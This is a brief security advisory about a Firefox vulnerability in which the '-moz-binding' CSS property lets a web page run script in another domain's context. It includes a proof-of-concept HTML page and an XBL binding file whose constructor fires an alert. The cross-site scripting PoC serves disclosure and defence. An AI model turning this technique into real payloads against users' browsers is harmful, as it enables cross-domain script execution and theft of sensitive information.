source: https://www.securityfocus.com/bid/16427/info
Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.
The issue affects the '-moz-binding' property.
This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.
http://domain1/path/to/page.html :
<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>
http://domain2/path/to/xbl.xml :
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>
</bindings>
